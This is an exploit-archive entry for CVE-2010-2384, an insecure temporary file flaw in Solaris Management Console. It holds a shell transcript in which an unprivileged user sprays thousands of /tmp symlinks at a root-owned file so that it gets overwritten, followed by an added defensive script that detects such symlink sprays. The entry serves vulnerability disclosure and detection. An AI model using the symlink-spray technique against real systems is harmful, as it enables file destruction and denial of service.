Oracle Solaris Management Console - WBEM Insecure Temporary File Creation

Author: Frank Stuart
type: local
platform: solaris
date_added: 2010-07-13  
date_updated: 2014-08-11  
verified: 1  
codes: CVE-2010-2384;OSVDB-66368  

raw file: 34314.sh  
source: https://www.securityfocus.com/bid/41642/info

The 'Solaris Management Console' subcomponent of Oracle Solaris creates temporary files in an insecure manner.

An attacker with local access can exploit this issue to overwrite arbitrary files. This may result in denial-of-service conditions or could aid in other attacks.

Solaris 9 and 10 are affected.

   $ id
   uid=101(fstuart) gid=14(sysadmin)
   $ cd /tmp
   $ x=0
   $ while [ "$x" -ne 30000 ] ;do
   > ln -s /etc/important /tmp/dummy.$x
   > x=$(expr "$x" + 1)
   > done
   $ ls -dl /etc/important
   -rw-r--r--   1 root     root          38 Jan  3 22:43 /etc/important
   $ cat /etc/important
      This is an important file!

      EOF
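
A defensive check for the pattern in the transcript above, added here as an example (it is not part of the original advisory or of Oracle's code): it reports targets outside a temporary directory that many numbered symlinks in that directory point to. The function name `symlink_spray_targets`, the default threshold and the scratch paths are assumptions, and it relies on `readlink` being installed.

```shell
#!/bin/sh
# symlink_spray_targets DIR [MIN]
# Prints "COUNT TARGET" for every target outside DIR that at least MIN
# symlinks in DIR with a numbered suffix (name.N...) point to.
# MIN defaults to 100 (an assumed threshold; tune it for your hosts).
symlink_spray_targets() {
    dir=$1
    min=${2:-100}
    for f in "$dir"/*.[0-9]*; do
        [ -L "$f" ] || continue              # only symlinks are of interest
        target=$(readlink "$f") || continue
        case $target in
            */../*|../*) ;;                  # climbs out through ".."
            "$dir"/*) continue ;;            # absolute path that stays in DIR
            /*) ;;                           # absolute path outside DIR
            *) continue ;;                   # relative, resolves beneath DIR
        esac
        printf '%s\n' "$target"
    done | sort | uniq -c | awk -v min="$min" '
        $1 >= min { c = $1; sub(/^[ \t]*[0-9]+[ \t]+/, ""); print c, $0 }'
}

# Constructed demo in a scratch directory (no real system paths are touched).
demo=$(mktemp -d)
mkdir "$demo/tmp" "$demo/etc"
: > "$demo/etc/important"
n=0
while [ "$n" -lt 200 ]; do
    ln -s "$demo/etc/important" "$demo/tmp/dummy.$n"
    n=$((n + 1))
done
symlink_spray_targets "$demo/tmp" 100
rm -rf "$demo"
```

A hit on a root-owned target from links owned by an unprivileged user is the condition worth alerting on; the link owner can be read with `ls -l` on any of the flagged names.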